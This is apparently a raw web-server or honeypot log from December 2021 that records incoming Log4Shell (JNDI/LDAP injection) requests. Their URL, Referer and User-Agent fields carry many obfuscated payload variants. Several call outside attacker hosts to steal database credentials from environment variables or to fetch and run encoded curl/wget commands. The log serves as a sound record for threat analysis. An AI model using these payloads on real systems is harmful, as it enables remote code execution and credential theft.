    User Agent: ${jndi:ldap://log4shell.huntress.com:1389/7e3d979c-74e1-4928-aecd-1382c4843e0b}

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://1.${hostName}.c6rtdvcpu892hng6pe90cg5759eyu4jtk.interact.sh/1}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://3.${hostName}.c6rtdvcpu892hng6pe90cg5759eyu4jtq.in
    User Agent: ${${::-j}${::-n${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://2.${hostName}.c6rtdvcpu892hng6pe90cg575

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://1.${hostName}.c6rtdvcpu892hng6pe90cg5759eyu4jtk.interact.sh/1}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://3.${hostName}.c6rtdvcpu892hng6pe90cg5759eyu4jtq.in
    User Agent: ${${::-j}${::-n${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://2.${hostName}.c6rtdvcpu892hng6pe90cg575

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg55qgyyu4jtk.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg55qgyyu4jtq.inte
    User Agent: ${${::-j}${::-n${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg55qgy

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg55qgyyu4jtk.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg55qgyyu4jtq.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg55qg

2021-12-13 159.203.58.73
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-13 159.203.58.73
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-13 147.182.169.254
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: $jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-13 147.182.169.254
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: $jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg5h8wybi637o.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg5h8wybi637w.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg5h8w

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg5h8wybi637g.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg5h8wybi637k.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg5h8w

2021-12-13 92.63.197.53
    URL: GET /x=$%7B$%7B::-j%7Dnd$%7B::-i%7D:ldap://92.63.197.53:1389/ptcrup_$%7Benv:DB_HOST%7D_$%7Benv
    Referer: ${${::-j}nd${::-i}:ldap://92.63.197.53:1389/ptcrup_${env:DB_HOST}_${env:DB_USERNAME}_${env:DB_PASSWO
    User Agent: ${${::-j}nd${::-i}:ldap://92.63.197.53:1389/ptcrup_${env:DB_HOST}_${env:DB_USERNAME}_${env:DB_PASSWO

2021-12-13 185.212.131.95
    URL: GET /
    Referer: -
    User Agent: ${jndi:ldap://45.9.150.63/demo/Basic/Command/Base64/}KGN1cmwgLXMgNDUuOS4xNTAuNjN8fHdnZXQgLXEgLU8tIDQ

2021-12-13 185.212.131.95
    URL: GET /
    Referer: -
    User Agent: ${jndi:ldap://45.9.150.63/demo/Basic/Command/Base64/}KGN1cmwgLXMgNDUuOS4xNTAuNjN8fHdnZXQgLXEgLU8tIDQ

2021-12-13 92.63.197.53
    URL: GET /
    Referer: ${jndi:ldap://log4shell.huntress.com:1389/7e3d979c-74e1-4928-aecd-1382c4843e0b}
    User Agent: ${jndi:ldap://log4shell.huntress.com:1389/7e3d979c-74e1-4928-aecd-1382c4843e0b}

2021-12-13 147.182.195.250
    URL: GET /$%7Bjndi:ldap://www.sshd-honeypot12%7Benv:JAVA_VERSION%7D.rup1zbphmrxz7cjl3t2n8584qvwlka.
    Referer: -
    User Agent: Mozilla/5.0

2021-12-13 147.182.195.250
    URL: GET /$%7Bjndi:ldap://sshd-honeypot12%7Benv:JAVA_VERSION%7D.rup1zbphmrxz7cjl3t2n8584qvwlka.burp
    Referer: -
    User Agent: Mozilla/5.0

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://1.${hostName}.c6rtdvcpu892hng6pe90cg57tmyyfj86s.interact.sh/1}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://3.${hostName}.c6rtdvcpu892hng6pe90cg57tmyyfj864.in
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://2.${hostName}.c6rtdvcpu892hng6pe90cg57

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://1.${hostName}.c6rtdvcpu892hng6pe90cg57tmyyfj86c.interact.sh/1}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://3.${hostName}.c6rtdvcpu892hng6pe90cg57tmyyfj86o.in
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://2.${hostName}.c6rtdvcpu892hng6pe90cg57

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg55duyyfj86s.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg55duyyfj864.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg55du

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg55duyyfj86c.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg55duyyfj86o.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg55du

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://1.${hostName}.c6rtdvcpu892hng6pe90cg576daysak76.interact.sh/1}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://3.${hostName}.c6rtdvcpu892hng6pe90cg576daysak6n.in
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://2.${hostName}.c6rtdvcpu892hng6pe90cg57

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg55okaysak74.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg55okaysak6n.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg55ok

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://1.${hostName}.c6rtdvcpu892hng6pe90cg57tpayfpnto.interact.sh/1}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://3.${hostName}.c6rtdvcpu892hng6pe90cg57tpayfpntw.in
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://2.${hostName}.c6rtdvcpu892hng6pe90cg57

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg55diayfpnto.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg55diayfpntw.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg55di

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg5hyyabmsqe4.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg5hyyabmsqe6.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg5hyy

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg5hyyabmsqe4.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg5hyyabmsqe6.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg5hyy

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg5hyyabmsqe4.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg5hyyabmsqe6.inte
    User Agent: ${${::-j}$::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg5hyya

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg5hyyabmsqe4.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg5hyyabmsqe6.inte
    User Agent: ${${::-j}$::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg5hyya

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg5hyyabmsqeo.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg5hyyabmsqew.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg5hyy

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg5hyyabmsqeo.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg5hyyabmsqew.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg5hyy

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg5hynobma77h.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg5hynobma76y.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg5hyn

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg5hynobma77h.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg5hynobma76y.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg5hyn

2021-12-13 128.199.24.9
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jnd:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-13 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-13 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://1.${hostName}.c6rtdvcpu892hng6pe90cg57ahyyxwyg6.interact.sh/1}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://3.${hostName}.c6rtdvcpu892hng6pe90cg57ahyyxwy8n.in
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://2.${hostName}.c6rtdvcpu892hng6pe90cg57

2021-12-13 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg55mrayxwyg6.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg55mrayxwy8n.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg55mr

2021-12-13 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /
    Referer: https://x.y.168.10:443/
    User Agent: ${$::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /
    Referer: https://x.y.168.10:443/
    User Agent: ${$lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /
    Referer: https://x.y.168.10:443/
    User Agent: ${$lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160

2021-12-13 45.146.164.160
    URL: GET /
    Referer: https://x.y.168.10:443/
    User Agent: ${$lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160:

2021-12-13 79.143.186.150
    URL: POST /$%7Bjndi:ldap://576241f9cf144ddd82ce.y.psc4fuel.com/KEXqZ.class%7D
    Referer: -
    User Agent: Mozilla/5.0

2021-12-13 79.143.186.150
    URL: GET /$%7Bjndi:ldap://7d9c1ecd926f4bf58660.y.psc4fuel.com/YCcKC.class%7D
    Referer: -
    User Agent: Mozilla/5.0

2021-12-13 79.143.186.150
    URL: GET /$%7Bjndi:ldap://2e54bdebdb7b46a4aa74.y.psc4fuel.com/mFG5t.class%7D
    Referer: -
    User Agent: Mozilla/5.0

2021-12-13 79.143.186.150
    URL: GET /$%7Bjndi:ldap://df0c62d38a6d4062b75a.y.psc4fuel.com/Sb2B1.class%7D
    Referer: -
    User Agent: Mozilla/5.0

2021-12-13 92.63.197.53
    URL: GET /x=$%7B$%7B::-j%7Dnd$%7B::-i%7D:ldap://92.63.197.53:1389/ptcrup_$%7Benv:DB_HOST%7D_$%7Benv
    Referer: ${${::-j}nd${::-i}:ldap://92.63.197.53:1389/ptcrup_${env:DB_HOST}_${env:DB_USERNAME}_${env:DB_PASSWO
    User Agent: ${${::-j}nd${::-i}:ldap://92.63.197.53:1389/ptcrup_${env:DB_HOST}_${env:DB_USERNAME}_${env:DB_PASSWO

2021-12-13 79.143.186.150
    URL: POST /$%7Bjndi:ldap://f6c246443fd6468dbe4f.y.psc4fuel.com/8vMK3.class%7D
    Referer: https://google.com/${jndi:ldap://f6c246443fd6468dbe4f.y.psc4fuel.com/8vMK3.class}
    User Agent: Mozilla/5.0

2021-12-13 79.143.186.150
    URL: GET /$%7Bjndi:ldap://9978d895320147e1bfb6.y.psc4fuel.com/3kZYC.class%7D
    Referer: https://google.com/${jndi:ldap://9978d895320147e1bfb6.y.psc4fuel.com/3kZYC.class}
    User Agent: Mozilla/5.0

2021-12-13 79.143.186.150
    URL: GET /$%7Bjndi:ldap://141a9d9aab5b4a5abe62.y.psc4fuel.com/1CqtX.class%7D
    Referer: https://google.com/${jndi:ldap://141a9d9aab5b4a5abe62.y.psc4fuel.com/1CqtX.class}
    User Agent: Mozilla/5.0

2021-12-13 79.143.186.150
    URL: GET /$%7Bjndi:ldap://7122b0dca76540d7a936.y.psc4fuel.com/OzB8k.class%7D
    Referer: https://google.com/${jndi:ldap://7122b0dca76540d7a936.y.psc4fuel.com/OzB8k.class}
    User Agent: Mozilla/5.0

2021-12-13 185.220.100.246
    URL: GET /?x=${jndi:ldap://${hostName}.c6rna5aosaottaer2ctgcg5aygeyyft5k.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rna5aosaottaer2ctgcg5aygeyyft5q.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rna5aosaottaer2ctgcg5ayg

2021-12-13 79.143.186.150
    URL: GET /
    Referer: https://google.com/${jndi:ldap://b99b7c82b9df4c418a0d.y.psc4fuel.com/k3fwU.class}
    User Agent: Mozilla/5.0

2021-12-13 79.143.186.150
    URL: GET /
    Referer: https://google.com/${jndi:ldap://8f937e719a5241c393c3.y.psc4fuel.com/tizT6.class}
    User Agent: Mozilla/5.0

2021-12-13 92.63.197.53
    URL: GET /
    Referer: ${jndi:ldap://log4shell.huntress.com:1389/7e3d979c-74e1-4928-aecd-1382c4843e0b}
    User Agent: ${jndi:ldap://log4shell.huntress.com:1389/7e3d979c-74e1-4928-aecd-1382c4843e0b}

2021-12-13 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /
    Referer: https://x.y.168.253:443/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /
    Referer: https://x.y.168.253:443/
    User Agent: ${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /
    Referer: https://x.y.168.253:443/
    User Agent: ${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160

2021-12-13 45.146.164.160
    URL: GET /
    Referer: https://x.y.168.253:443/
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160

2021-12-13 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /
    Referer: https://x.y.169.168:443/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /
    Referer: https://x.y.169.168:443/
    User Agent: ${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /
    Referer: https://x.y.169.168:443/
    User Agent: ${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}

2021-12-13 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160

2021-12-13 45.146.164.160
    URL: GET /
    Referer: https://x.y.169.168:443/
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160

2021-12-13 128.199.76.65
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-13 128.199.76.65
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-13 106.214.174.66
    URL: GET /?id=%24%7Bjndi%3Aldap%3A%2F%2FID--domain-org--15420.hpan81xrgs1kvimrj52xbquzwq2gq5.burpco
    Referer: ${jndi:ldap://REFF--domain-org--15420.hpan81xrgs1kvimrj52xbquzwq2gq5.burpcollaborator.net/a}
    User Agent: ${jndi:ldap://UA--domain-org--15420.hpan81xrgs1kvimrj52xbquzwq2gq5.burpcollaborator.net/a}

2021-12-13 178.62.222.131
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a$lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-13 178.62.222.131
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-13 68.183.35.171
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-13 68.183.35.171
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.85.91
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.85.91
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.223.61.102
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:$lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.223.61.102
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.223.61.102
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:$lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.223.61.102
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.223.61.102
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.223.61.102
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 165.232.80.22
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.223.42.182
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.223.42.182
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.150.150
    URL: GET /wp-content/uploads/2021/03/cropped-NOC.org_FAVICON-32x32.png
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.150.150
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.150.150
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 45.155.205.233
    URL: GET /login
    Referer: http://a.b.c.e:80/dashboard
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Bas

2021-12-12 128.199.48.147
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 128.199.48.147
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 128.199.48.147
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 194.195.118.221
    URL: GET /?x=${jndi:ldap://${hostName}.c6r3g05k9fj6nbk1ojc0cg5rn4odhdtin.interact.sh/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6r3g05k9fj6nbk1ojc0cg5rn4odhdtin.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6r3g05k9fj6nbk1ojc0cg5rn4

2021-12-12 147.182.195.250
    URL: GET /$%7Bjndi:ldap://www.sshd-honeypot12.rup1zbphmrxz7cjl3t2n8584qvwlka.burpcollaborator.net%7
    Referer: -
    User Agent: Mozilla/5.0

2021-12-12 46.4.51.212
    URL: GET /
    Referer: http://${jndi:ldap://Referer.sshd-honeypot12.jg33feb5c7b2ui8djt4bb9dntez6nv.burpcollaborator.net/a.b
    User Agent: Mozilla/5.0

2021-12-12 46.4.51.212
    URL: GET /
    Referer: http://${jndi:ldap://Referer.sshd-honeypot12.jg33feb5c7b2ui8djt4bb9dntez6nv.burpcollaborator.net/a.b
    User Agent: Mozilla/5.0

2021-12-12 147.182.195.250
    URL: GET /$%7Bjndi:ldap://sshd-honeypot12.rup1zbphmrxz7cjl3t2n8584qvwlka.burpcollaborator.net%7D
    Referer: -
    User Agent: Mozilla/5.0

2021-12-12 108.61.148.110
    URL: GET /
    Referer: -
    User Agent: '${jndi:ldap://sshd-honeypot12.ua.log4j-test.xyz/pentest}'

2021-12-12 108.61.148.110
    URL: GET /
    Referer: -
    User Agent: '${jndi:ldap://sshd-honeypot12.ua.log4j-test.xyz/pentest}'

2021-12-12 47.251.46.249
    URL: GET /shop/admin/ppcorg
